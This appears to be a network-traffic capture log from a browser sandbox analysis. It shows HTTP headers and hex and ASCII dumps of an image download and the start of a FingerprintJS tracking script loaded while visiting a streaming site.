                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 00 f4 03 2e e6 8f 38 64 d8 7e 7a 1f 1d 36 6c 6b b7 bb 37 3f f4 b3 ee 62 60 f1 7e b0 20 1e 30 9d b9 94 c1 92 8d 12 8a c2 9b 2e 8f 00 06 86 29 9f 27 b6 84 02 54 af 58 83 c6 34 2d 91 69 f4 fb 84 6c b9 71 f5 0e a4 9f 93 92 64 16 20 8a 21 1e ba 82 08 26 87 48 48 39 48 13 2e 98 11 32 69 c8 30 ac 29 0a 10 60 86 54 3e a1 e3 e6 60 1f da 51 36 46 11 f0 dc 7d 35 4e 03 0e 92 c4 db 5d 42 25 4a f3 f8 b7 f0 34 b3 84 5d 42 85 7e 44 13 01 ac 6b 05 18 71 89 c2 23 e9 03 08 74 73 36 2e 3c 6c d0 f5 ea 0c 47 c7 23 1f 91 95 a0 c9 d5 46 5e a6 e9 a4 70 d8 56 c4 12 a1 84 4d 52 de 17 86 37 ac 78 56 b1 51 96 68 97 fb 42 5c 0f 09 97 09 9a 9f f4 3c 30 90 67 53 af 27 4e 84 52 0d 19 db 70 69 da 1c 44 4a 96 6e 68 d9 1b 1d 29 58 b2 e1 3e 35 cd 58 2a 13 f5 08 f3 5e 01 51 39 8f d6 f2 62 e4
                                                                                                                                                                                          Data Ascii: .8d~z6lk7?b`~ 0.)'TX4-ilqd !&HH9H.2i0)`T>`Q6F}5N]B%J4]B~Dkq#ts6.<lG#F^pVMR7xVQhB\<0gS'NRpiDJnh)X>5X*^Q9b
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 47 40 e0 79 a9 da 5b 00 42 67 cc 2d 50 2f 2b 2a 23 c7 82 bb aa 6d e4 d0 5f de ab 38 74 1b 5a b2 43 4b e9 f0 f4 4c ee 9c 1d a6 16 4e 61 b5 ad d6 2b 40 8d a7 7f 2b 8d ca bb 95 13 8c 66 28 ff 00 bb 05 43 c8 2a d0 7a 0b 4c 00 eb 85 25 da 4b 27 5d 5b a6 cb 93 48 d0 78 3d db d4 d7 1c 79 20 70 47 96 67 7d 63 72 01 db c7 ad a9 95 fd 34 f0 4e 2d d8 44 ac af 71 10 8c d9 d8 f4 3d 8e e4 3a 2e 93 b6 d9 f3 ae cf 61 42 9d 0f e9 20 6d 27 a1 d4 1b 95 87 c3 91 72 bf e6 f5 26 77 9f b7 40 bb 90 2c 6c 95 61 b3 e6 8a f5 5a 7c ca c8 8e ea 71 59 38 fe 93 e8 a4 e5 38 44 f4 5e b5 ab 6e 7b f9 21 05 95 9d cd 59 4e e7 51 6b 65 3f e2 dc f6 99 df 1d 1a f6 b5 75 47 2f 28 06 2d b4 fd 96 ab 6e 09 e7 b0 f6 09 df 6f 4e ee 18 a9 ae c8 56 19 d7 c3 61 e5 08 04 36 3a 75 8c e1 5c 36 a0 ca e2 85
                                                                                                                                                                                          Data Ascii: G@y[Bg-P/+*#m_8tZCKLNa+@+f(C*zL%K'][Hx=y pGg}cr4N-Dq=:.aB m'r&w@,laZ|qY88D^n{!YNQke?uG/(-noNVa6:u\6
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: ce 6d 4e b3 62 76 17 62 8e f4 79 c9 de 09 d5 4e c6 e4 ef 04 6f 4e 4e 4e 3b 7b aa 89 f7 54 6d 4e 4e 46 f4 ec c5 3a d4 e2 89 b9 38 a2 51 b9 13 6a 3c a0 53 4a 05 04 c4 d2 9a 7d ca 05 05 7a 16 2b 8e 6c 99 a1 ff 00 2b 16 48 df e7 a3 e6 98 60 5f e0 98 69 53 ba 21 30 d8 3f e5 aa 10 b5 35 35 0f 66 a8 7b 08 20 82 6a 6f f1 98 21 72 1f 23 e9 5e ec 5e e7 30 bf d8 5b 7b a8 33 60 8f 82 3e 08 ab 03 82 35 d3 cb df f9 b1 a0 8e d1 5b f4 c1 f3 4e 88 d2 77 7e 53 43 f7 e0 a0 1a 17 89 b6 1a f6 48 de 8e a3 fe 2c ec 19 48 d0 f1 19 b1 58 af 74 19 ae f1 58 0f 0c db 3d 55 c1 04 d4 10 8e c5 f2 ec bf ff c4 00 2a 10 01 00 02 02 01 03 03 03 05 01 01 01 00 00 00 00 01 00 11 21 31 41 10 51 61 71 81 91 30 a1 c1 20 40 b1 d1 f0 e1 f1 50 ff da 00 08 01 01 00 01 3f 21 fa 04 12 a8 73 2b f9 a3
                                                                                                                                                                                          Data Ascii: mNbvbyNoNNN;{TmNNF:8Qj<SJ}z+l+H`_iS!0?55f{ jo!r#^^0[{3`>5[Nw~SCH,HXtX=U*!1AQaq0 @P?!s+
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: ef df 95 7b c6 54 af 61 86 5c 77 a9 62 c6 57 79 98 25 40 63 b1 45 c5 1a cc 1d d8 46 f2 04 f3 1b 07 f4 d0 7a 04 a8 41 d2 c8 f0 11 66 6b a7 7f a6 38 f1 e6 18 a4 9a a5 99 a0 87 a0 0a 89 af b2 b6 d5 9e 0e e5 53 de 0e 58 d5 42 03 3b e3 7b 86 0e 1d bb 1d dc a6 bb fe ae 0a 8e ec 7c a5 e1 98 e0 59 b9 87 74 1a 06 37 70 1b a5 b2 61 0d a0 7b 98 81 6b c3 a4 16 f8 57 75 c3 e2 24 2a 38 7f df 78 2f a2 bb 33 c1 29 2f ae d7 89 bd df 64 f5 ec 62 e8 48 c3 f4 21 55 39 63 cc dc 62 4c 6c 4e 0c ce 9a 17 5a c4 a5 ab b8 4a 6c b2 3e 46 66 6d b3 57 45 53 2b 78 de ea 63 81 9b 88 db 2d 55 e3 f4 88 d0 46 f0 7d ef a1 06 a5 c5 d2 8b 43 54 bd b9 4e 49 68 4e f0 df c2 be e9 99 4e e5 05 f8 25 c6 c4 20 37 63 ec 94 7f 10 6e 0b 7f e9 5a 41 08 78 25 50 c1 4c 1e 9b 9b eb 84 2f 6d fc e2 6c 7e 21
                                                                                                                                                                                          Data Ascii: {Ta\wbWy%@cEFzAfk8SXB;{|Yt7pa{kWu$*8x/3)/dbH!U9cbLlNZJl>FfmWES+xc-UF}CTNIhNN% 7cnZAx%PL/ml~!
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 1b 89 5b d7 15 46 01 e7 27 ed 0f 3c b5 29 c3 6f 5c 84 c0 4b 0a 6b 45 7b de 38 f1 29 1b 62 ab 7d 19 b5 68 f6 dc dd ce d8 84 8f 3d 8b f5 c4 63 b6 71 d8 42 9b c2 97 f2 86 0f ba 68 c9 7a 1f bf 30 0b fc e9 e4 7c a5 e5 66 9c b4 b0 de 1d 8e f5 1e bd f1 6b 33 25 5a dc ec 01 00 e2 d0 f0 64 25 ae e5 49 8d 97 3d ac 0f 78 d5 d0 c7 b0 6f 77 2f 1a 13 7b d5 96 7c eb bc 57 06 7b ea 8a bb dc af 1f b4 b0 b5 58 8d 76 76 40 29 4c e0 7c e5 f9 89 91 a5 d9 7c e3 f0 2b da 5e 85 74 6e d4 f9 b5 db 62 cf b9 8f 49 fe c3 c7 79 56 d4 ea ca 5e 65 cd 63 59 df 1f f1 a2 24 42 a9 69 4a b4 f9 b2 a6 77 1d 8a 5a a6 c7 70 b3 de 39 af 51 4e ff 00 f5 22 23 22 e9 d1 e2 f5 80 08 88 81 f1 1d f4 81 45 b8 21 7a 9a 60 16 ed 03 7d 1c 4c 9b 38 cd ef 19 3e 25 f6 e3 5e 59 e1 7e 9c 4e 01 0b b4 dd 6a fd 22
                                                                                                                                                                                          Data Ascii: [F'<)o\KkE{8)b}h=cqBhz0|fk3%Zd%I=xow/{|W{Xvv@)L||+^tnbIyV^ecY$BiJwZp9QN"#"E!z`}L8>%^Y~Nj"


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          14192.168.2.1649725151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:54 UTC676OUTGET /images/M/MV5BZDk3YzBiOTItMTY3My00MWZhLWI5MTYtNDU5Yzk3NThjZDQzXkEyXkFqcGdeQXVyNzM3NDU4Njk@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:55 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 28244
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 5bbfbfed-30c5-4207-858e-15912d52eff1
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Wed, 08 Mar 2017 12:26:55 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Mon, 05 Sep 2044 14:32:31 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 2224402
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:55 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kjyo7100112-IAD, cache-nyc-kteb1890049-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c2 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 05 03 04 06 07 00 01 02 08 09 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 03 04 00 01 02 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f2 5e d1 d8 3a 8b e2 7d 56 fb eb 8e ab
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5^:}V
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 68 1f 9a ae aa 55 f4 8b fa 3a b1 b0 70 6b 7a cd f3 ed a6 83 16 7a 90 f9 21 d7 4c 8a eb 97 10 0a 4f d0 de 52 59 bb 10 74 26 63 cd ec 0e 07 29 8f d3 91 28 8c e2 18 f1 6f 4b 1e ac b0 f9 3c 99 89 98 db c8 ac 80 c4 06 56 c0 4b b2 4c ab 20 66 b2 dc 17 2c 2a 5b 88 1b c0 86 c8 47 cc 35 4d 87 49 15 ce e9 c1 56 2d 48 b1 c8 c1 54 4b 72 01 44 db 55 3b aa 5d 4a 85 96 e0 bb f4 15 2f 67 28 79 61 90 c4 43 0f bb 06 5c b9 a5 ad 96 f3 1d e0 2d 7b 74 72 4c c4 63 13 e7 22 3f 9e 6b 1f 75 17 d1 fc 3f 3d ac e7 3c 37 e7 88 34 1e 0c 4f e7 91 65 dd 46 59 c8 f7 ad af cf 10 19 52 e6 7a 83 37 95 1a 96 69 24 e8 aa 8b 27 48 31 9a 8a 3b 2d 45 63 c5 91 94 25 57 e2 88 85 e5 eb 4e 82 54 cc 9f d4 99 8d f8 65 7f 68 f9 d3 3b 8c 4c 3c 67 bc d7 bc dd d0 37 e0 0a ee 5f 13 2d 71 f3 4e c5 4b 66 62
                                                                                                                                                                                          Data Ascii: hU:pkzz!LORYt&c)(oK<VKL f,*[G5MIV-HTKrDU;]J/g(yaC\-{trLc"?ku?=<74OeFYRz7i$'H1;-Ec%WNTeh;L<g7_-qNKfb
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 17 8b c9 de 42 e4 b2 fd 06 e6 4b a2 b0 0d c8 c3 6b 55 ad 90 32 6f 10 6c 9b 4a b3 ec 77 7a 01 35 05 a8 36 ca 60 ec 1b 84 b0 76 4b 7f 8c 35 32 4f 43 79 90 a6 0a dd e4 a6 86 ee b4 4f 62 f2 6c 9a 63 f2 c6 fd 41 9b 94 4b 06 73 2c 9e c5 ee f2 4b 86 39 29 ff 00 63 72 ac 86 0f d5 d1 14 9a 73 79 7b cb 24 f6 b3 de 19 71 b5 99 f6 cb bd 05 e7 6c fb c9 5f 6d 9f 59 3b ac 69 95 1e 69 a6 4b 77 8d 32 53 ac 6d ab 8e 74 d7 73 2e 76 db 25 ba d3 5d 4a 75 b6 99 23 9d b5 d4 a7 9c b6 c9 1c e3 6d 5c 75 8d 79 94 f3 6c f5 23 cc 65 92 9c 70 df 9d 09 c6 36 e6 c6 8e d3 cd aa bf 6d 7a 9b 77 b6 d9 9d b9 c6 99 23 bc 69 b9 1c e9 be 48 e7 1b 64 8e 31 be 48 e3 6d b5 23 ad 36 dd d3 8d b5 c9 1c e9 b6 48 e7 1b e4 8e 31 b6 e4 5f 10 c9 17 d2 39 29 6c 47 99 4a f2 9e 5e 7b ce 35 2b 33 32 f3 bc cc
                                                                                                                                                                                          Data Ascii: BKkU2olJwz56`vK52OCyOblcAKs,K9)crsy{$ql_mY;iiKw2Smts.v%]Ju#m\uyl#ep6mzw#iHd1Hm#6H1_9)lGJ^{5+32
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 37 1e 4c 2f 47 fb 6d 1b 11 4f 19 92 cd 76 80 b1 6f 0f a4 ea b7 3b e9 62 29 b1 eb de 71 f2 65 37 f6 6c 4b 26 26 6a 66 2f 25 59 a8 d1 a1 f4 2b 02 ce 13 5e ad 2c 86 57 12 62 62 b6 47 c6 3e 2a e3 fc 64 3f b4 ce 4b 87 4b dc 6d b5 ae 6d 9f c3 5e ea 18 4b 53 72 b1 b5 d4 c1 6e f6 4e 45 93 90 1e 61 c5 4c 97 e4 56 85 41 a5 6a 3c 18 0e e0 b3 b6 0c b3 a9 55 32 72 6b 68 1f 97 db 92 fe 21 9d 23 23 b3 7a fa 72 85 e6 f7 1b c4 27 d0 8f 53 0c 68 f0 ca e5 73 a4 de 07 2a cf 29 9a eb 55 64 bf 51 ea 0f d4 5f c7 d2 f6 50 b3 7e 1a ff 00 03 47 11 0f 14 63 3a 65 21 29 ac cc 84 2e 52 b1 cb 88 01 4b 71 9b 33 2d 78 36 c0 32 ec 44 3b 21 c7 f4 3f 6a 5b 67 23 eb d3 fa a3 d9 e2 c4 b1 5b e1 e1 84 c3 ea 56 6a 18 63 47 86 57 10 0f 44 be ca fe de a7 dc c9 ac 72 c3 40 9b df 50 b7 db a9 d1 ab
                                                                                                                                                                                          Data Ascii: 7L/GmOvo;b)qe7lK&&jf/%Y+^,WbbG>*d?KKmm^KSrnNEaLVAj<U2rkh!##zr'Shs*)UdQ_P~Gc:e!).RKq3-x62D;!?j[g#[VjcGWDr@P
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 92 ac 83 4f 13 3a bd 20 3f 71 7a 6d fa 3a 8a fb 10 9f 45 68 1b 8c ee cd 44 89 01 f2 b1 7c b6 a6 3a 7d c2 78 52 a2 58 9c 88 9b 9f d4 6f 2e 20 a8 b6 a3 50 6c 81 38 85 13 01 ca b1 99 43 69 a9 8a cc 79 99 93 a3 59 df 4d a7 b6 bc 7d 58 eb d3 e6 63 bf 67 25 d0 ce ae bd bb 44 c6 b3 9d 48 67 5f a3 bb 43 34 a9 f6 8c 21 3d fa 4a c0 78 1d 8e 99 92 32 52 72 84 ec c3 01 83 46 77 00 89 16 29 12 b3 f3 15 84 52 36 67 21 3c 4f 1b 9a f3 b8 a3 c4 27 50 b6 ac 59 5f b6 72 e6 81 a7 4c 7d 77 2b 2e 4b 6c 2d 09 db 40 3d 58 78 33 19 f9 26 8c ea e3 83 a5 82 b7 0e aa d3 f1 15 5f 0d 3a 15 dc e8 d4 ea ad fb 36 83 4b 6b 90 98 ed a9 92 9c 5c cc 5c a6 c6 7e 6b 8d 92 99 4b c9 75 36 67 23 e6 77 0c e6 62 45 31 4c 43 16 08 4c 33 c7 a1 1b 9a 9d b0 66 a6 23 78 65 8d fb 57 06 89 ef 23 f4 dc fd
                                                                                                                                                                                          Data Ascii: O: ?qzm:EhD|:}xRXo. Pl8CiyYM}Xcg%DHg_C4!=Jx2RrFw)R6g!<O'PY_rL}w+.Kl-@=Xx3&_:6Kk\\~kKu6g#wbE1LCL3f#xeW#
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 83 5c fa a1 45 c7 73 67 72 99 dd a6 74 86 46 a8 f0 df ba f9 d3 bf d5 ae 57 fe 01 3a 9f 8f a3 94 64 9c 57 e6 b9 58 eb 9a 8b 75 36 db ec 71 3a a9 d5 b4 4e 6a 7e ea aa 18 95 bb 94 c6 ad 46 a7 4d 2a 6a ec 92 86 87 6a 8d 96 71 1b 8f 85 4a 29 78 b6 6f 87 2c ac 2a 68 ad df f4 08 22 93 14 98 09 85 01 82 b4 55 46 25 78 2c e9 59 42 b7 35 1e a3 86 72 00 64 ee 10 78 b7 2d c6 b3 8f cd 81 87 1d f5 af f5 6c 9e 26 84 e8 7f e0 32 cf f2 5f 3a 6f fa b5 44 ff 00 0c eb 4b c4 e2 ce 42 62 e6 1c 46 d8 ea 38 23 36 be f5 1d 63 fc b4 4c 1c 6f ab 7f 39 59 5f 57 71 78 78 4a 32 97 1a c4 b0 75 9c 6e 4a 2f 0f 62 e8 cb 5b fe 3b 46 65 e3 3a 91 fd 97 9c 84 dc 26 0f 41 a8 35 3c 4f 13 97 f1 07 c6 a1 5d cc 6e b0 d5 7b 6d 39 98 59 43 4e d8 fd 38 79 87 37 12 8f f5 95 b6 e2 cb 72 fa b5 79 35 3d
                                                                                                                                                                                          Data Ascii: \EsgrtFW:dWXu6q:Nj~FM*jjqJ)xo,*h"UF%x,YB5rdx-l&2_:oDKBbF8#6cLo9Y_WqxxJ2unJ/b[;Fe:&A5<O]n{m9YCN8y7ry5=
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 5f 46 ca 83 89 fe 8b 4e a7 f0 a6 58 23 57 b1 1a b6 56 22 6c 68 41 f1 e9 00 3a 9c 71 0a cf 58 6f 93 1b e6 55 57 44 1b 84 ff 00 53 51 b6 ae 23 a8 24 44 7d 7d a6 e4 d3 99 da 0d 40 07 ca d8 b2 c1 e8 c7 b0 96 24 92 48 8a da 9e 76 07 ed af 39 e9 b1 2e 04 86 d3 ad 68 59 f7 fb 16 d3 6a 59 e8 2b 47 d1 2a 63 1f 4a 61 5f cc b2 81 62 c2 a5 49 04 3e a7 9b 52 c1 2c af 67 43 f8 5c 87 f6 1f 89 c9 a8 76 62 b3 ee 9f 74 e3 f2 3c 98 8a 0a 0d 09 de 39 f5 b0 ed d9 3d 16 da 01 3b 6c 2c 31 1f 62 59 8e b6 0f 7d 86 ca fe d6 09 55 29 8f 49 c8 7c 8c fb ed 72 c7 03 96 b6 bb 45 76 66 70 95 9c 8a ca e6 f0 07 19 7c 95 e1 e0 2e 4d 9e 36 e3 71 9e b5 b4 cf a8 48 a7 bb 30 1f 50 9b 83 27 d1 59 f5 1e 84 5c 91 f6 cf 3c af 2c 0b 59 60 c9 fc 4b ea 2b 69 68 ab b8 eb 33 10 9c 30 03 d6 d1 54 76 1a
                                                                                                                                                                                          Data Ascii: _FNX#WV"lhA:qXoUWDSQ#$D}}@$Hv9.hYjY+G*cJa_bI>R,gC\vbt<9=;l,1bY}U)I|rEvfp|.M6qH0P'Y\<,Y`K+ih30Tv
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 9c 80 30 e6 ff 00 67 a9 28 96 75 0a 6c 5e 2f 76 20 e4 5a af 63 d4 06 1f 62 2e b6 04 4c 8b 53 e2 bd db 0e 89 b8 fc b5 28 55 55 e4 49 0c 36 0d 70 a1 fb 15 f5 8c 8a fe f1 fa a5 57 00 00 71 03 02 23 c6 52 4e 85 b4 91 ed 79 28 31 90 3c 6a 9d 7d c0 df 50 1f 90 33 d4 de fd cb 4e dc c5 04 a0 11 57 4b a3 35 35 b8 41 53 f0 4e a9 96 be a0 ff 00 26 bd 3d 13 15 7e e5 cc 5c cd 7b d0 38 ae aa ac 3e 43 ee ea 95 4f 25 1f 62 06 fc 38 f9 1d ae 53 28 02 1c d2 44 19 7f d8 70 61 00 c1 0a 7f 41 00 8d 59 9d b8 d8 01 cb 44 e9 c4 10 63 56 4b 88 7a 77 d9 99 54 1a c2 6c 18 1b f5 1e de 02 12 4f b3 35 38 ec 44 7d 1d 7e 04 dc 22 38 9a 85 0f b9 c0 e8 40 be fd 84 fd 4e a7 5f c2 b7 80 fd 41 1d f9 37 e3 f5 07 b1 14 ea 15 fd 84 6d 80 66 bf 2e 90 a4 22 05 9c 60 dc bb 1c 5b 53 56 74 54 95 2c
                                                                                                                                                                                          Data Ascii: 0g(ul^/v Zcb.LS(UUI6pWq#RNy(1<j}P3NWK55ASN&=~\{8>CO%b8S(DpaAYDcVKzwTlO58D}~"8@N_A7mf."`[SVtT,
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 18 8b 31 e0 78 d3 3b 73 9e e7 6a 99 99 5f 97 83 de b6 29 be 14 5c a2 d3 52 cc 16 b3 7a 01 8f bb b2 d0 4d 06 b1 1d 57 43 d3 2e 76 c4 5c eb 68 0f aa 64 b5 8b bb 94 00 b5 44 df 89 63 54 c9 87 32 35 50 0b 79 da 3d 1d 41 00 35 29 d2 d2 b7 12 4d 43 b9 5b 2a 0b 99 50 64 76 59 53 5e 2a 66 d3 c9 fe 54 6a a6 46 7a 69 18 b1 cf 6f 72 69 19 53 6c 68 b9 64 bc 6c 57 2b 02 c9 72 82 93 23 69 52 b0 e3 de a1 ad 35 a8 87 a0 e3 b4 77 2b 4a b2 9b 62 28 b5 96 77 41 58 da 99 52 e2 ac 7a 34 9a a0 4f 32 93 e9 c2 40 d8 99 08 50 76 c5 33 ae 63 af bc 62 6b 56 85 90 de e6 95 e1 48 7c 2a 05 4f 32 3d 83 b5 37 c9 5f 13 30 ed 28 bc 32 20 ce 4d 32 1c 94 4b b1 4a 25 18 e7 87 5a cb c2 96 24 d9 5f a8 37 88 85 73 f6 40 a7 b8 b2 2c 74 4c 48 53 70 50 6a c8 3f 4b d0 e9 b9 c6 0e 7b 91 82 ec b2 a0
                                                                                                                                                                                          Data Ascii: 1x;sj_)\RzMWC.v\hdDcT25Py=A5)MC[*PdvYS^*fTjFzioriSlhdlW+r#iR5w+Jb(wAXRz4O2@Pv3cbkVH|*O2=7_0(2 M2KJ%Z$_7s@,tLHSpPj?K{
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 68 bd f7 fa 2b 1d 01 9a 7b 53 1f 9c eb 64 ed 48 3b 39 2f e4 15 ed 71 59 41 93 cb 95 1c 97 25 82 ad 11 1a ee 4c d6 1d 18 3d d6 85 80 6b ce b0 0d 79 d3 35 45 63 02 5e be a3 7c 57 85 5c bc 27 92 88 3d a6 6f f7 5d a7 40 df 98 fc 86 d4 23 68 b9 78 0a 6a ae 90 f0 b0 ac 86 f0 bd 96 8c 00 0b fc 46 0f 6a c2 33 84 75 d7 7c 82 3d 9e 16 50 5a 80 7c d1 83 c3 dd 9d 16 ba 22 fc 62 8a 34 02 5e 30 af 89 7f 44 81 0d 1b d4 5e d0 73 57 87 1f 99 94 9b 96 9b 97 6d 99 67 cc 83 88 b0 d0 e4 1c f7 69 9a fb 78 8a 0a f1 b4 be a3 7c 57 85 5d 7a fb b9 51 d9 3d a6 79 8c fc 51 e9 11 e7 f7 5e 02 bb 0c 4f 3e 6f 55 d9 66 0c fa eb 40 ab 27 a0 cf d5 64 4f f6 fb 51 f4 f9 51 9b 8f 54 d4 23 0d 31 3b 53 dc f9 50 2b 8f 10 ed 6b 45 9f e5 03 bd 36 3f f2 7b ac 1d 66 bc 46 43 59 8a 24 f4 81 3a 93 0d
                                                                                                                                                                                          Data Ascii: h+{SdH;9/qYA%L=ky5Ec^|W\'=o]@#hxjFj3u|=PZ|"b4^0D^sWmgix|W]zQ=yQ^O>oUf@'dOQQT#1;SP+kE6?{fFCY$:


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          15192.168.2.1649728108.158.71.1404436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:55 UTC538OUTGET /?udcwd=1092278 HTTP/1.1
                                                                                                                                                                                          Host: d2w9cdu84xc4eq.cloudfront.net
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:56 UTC439INHTTP/1.1 200 OK
                                                                                                                                                                                          Content-Length: 232628
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:56 GMT
                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                          Cache-Control: no-store, no-cache, proxy-revalidate, must-revalidate, private, no-transform
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                          Via: 1.1 7499a2cb4ce8411b56e7edcaead781a0.cloudfront.net (CloudFront)
                                                                                                                                                                                          X-Amz-Cf-Pop: BAH53-P2
                                                                                                                                                                                          X-Amz-Cf-Id: k0nWzyjIWoacncSdlDa_w_WTzMEi4rsk7aSQhEaVrUH6K1_PjQ9LaQ==
                                                                                                                                                                                          2024-12-15 11:37:56 UTC14270INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 46 69 6e 67 65 72 70 72 69 6e 74 4a 53 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 65 2c 74 3d 31 2c 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 3c 72 3b 74 2b 2b 29 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 65 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 6f 29 26 26 28 6e 5b 6f 5d 3d 65 5b 6f 5d 29 3b 72 65 74 75 72 6e 20 6e 7d 2c 65 2e 61 70 70 6c 79 28 74 68 69 73 2c
                                                                                                                                                                                          Data Ascii: (function(){var FingerprintJS=function(n){"use strict";var e=function(){return e=Object.assign||function(n){for(var e,t=1,r=arguments.length;t<r;t++)for(var o in e=arguments[t])Object.prototype.hasOwnProperty.call(e,o)&&(n[o]=e[o]);return n},e.apply(this,
